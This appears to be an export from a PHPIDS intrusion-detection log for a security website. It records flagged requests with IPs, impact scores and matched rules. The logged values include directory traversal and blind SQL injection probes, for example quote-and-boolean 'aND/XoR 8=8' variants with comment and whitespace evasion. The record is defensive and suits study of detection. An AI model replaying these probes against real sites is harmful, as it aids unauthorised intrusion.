Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:121910
Name:GET.page
Value:../i.php
Page:/i.php?page=../i.php
IP:66.249.67.178
Impact:10
Created:2010-04-20 10:30:33
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:121907
Name:REQUEST.page
Value:../i.php
Page:/i.php?page=../i.php
IP:77.227.232.252
Impact:10
Created:2010-04-20 10:30:31
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:121908
Name:GET.page
Value:../i.php
Page:/i.php?page=../i.php
IP:77.227.232.252
Impact:10
Created:2010-04-20 10:30:31
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:121905
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/XoR/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:51:00
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121906
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/XoR/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:51:00
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121903
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/XoR/**/%278%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:56
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121904
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/XoR/**/%278%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:56
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121901
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09XoR%09%278%27%3D%278
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:54
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121902
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09XoR%09%278%27%3D%278
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:54
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121899
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09XoR%09%278%27%3D%273
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:51
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121900
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09XoR%09%278%27%3D%273
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:51
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121897
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20XoR%20%278%27%3D%278
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:49
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121898
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20XoR%20%278%27%3D%278
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:49
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121895
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20XoR%20%278%27%3D%273
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:46
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121896
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' XoR '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20XoR%20%278%27%3D%273
IP:60.10.210.25
Impact:38
Created:2010-04-20 07:50:46
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121893
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8%3D8
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121894
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8%3D8
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121891
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8%3D3
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121892
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/XoR/**/8%3D3
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121889
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27/**/aND/**/%278%25%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121890
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27/**/aND/**/%278%25%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121887
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27/**/aND/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:24
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121888
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27/**/aND/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:24
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121885
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%09aND%09%278%25%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:22
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121886
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%09aND%09%278%25%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:22
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121883
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%09aND%09%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121884
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%09aND%09%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121881
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%20aND%20%278%25%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:15
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121882
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%20aND%20%278%25%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:15
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121879
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%20aND%20%278%25%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:14
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121880
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers%' aND '8%'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%25%27%20aND%20%278%25%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:50:14
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121877
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/aND/**/%278%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:13
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121878
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/aND/**/%278%27%3D%273
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:13
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121875
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/aND/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:11
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121876
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27/**/aND/**/%278%27%3D%278
IP:60.10.210.25
Impact:66
Created:2010-04-20 07:50:11
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121873
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers/**/aND/**/8=3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/aND/**/8%3D3
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:06
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121874
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers/**/aND/**/8=3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/aND/**/8%3D3
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:50:06
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121871
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers/**/aND/**/8=8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/aND/**/8%3D8
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:49:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121872
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers/**/aND/**/8=8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers/**/aND/**/8%3D8
IP:60.10.210.25
Impact:6
Created:2010-04-20 07:49:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121869
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09aND%09%278%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:56
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121870
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09aND%09%278%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:56
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121867
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09aND%09%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:53
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121868
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%09aND%09%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:53
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121865
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20aND%20%278%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:37
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121866
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='3
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20aND%20%278%27%3D%273
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:37
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121863
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20aND%20%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:36
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121864
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers' aND '8'='8
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%20aND%20%278%27%3D%278
IP:60.10.210.25
Impact:46
Created:2010-04-20 07:49:36
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121861
Name:REQUEST.page
Value:security/?page=security/AQuickIntrotoSniffers'`([{^~
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%60%28%5B%7B%5E%7E
IP:60.10.210.25
Impact:24
Created:2010-04-20 07:49:28
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:121862
Name:GET.page
Value:security/?page=security/AQuickIntrotoSniffers'`([{^~
Page:/i.php?page=security/?page=security/AQuickIntrotoSniffers%27%60%28%5B%7B%5E%7E
IP:60.10.210.25
Impact:24
Created:2010-04-20 07:49:28
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:121859
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-20 07:06:22
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:121860
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-20 07:06:22
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:121857
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.40
Impact:12
Created:2010-04-20 06:04:05
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:121858
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.40
Impact:12
Created:2010-04-20 06:04:05
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:121855
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0A%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:98.129.136.178
Impact:8
Created:2010-04-20 06:01:21
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121856
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
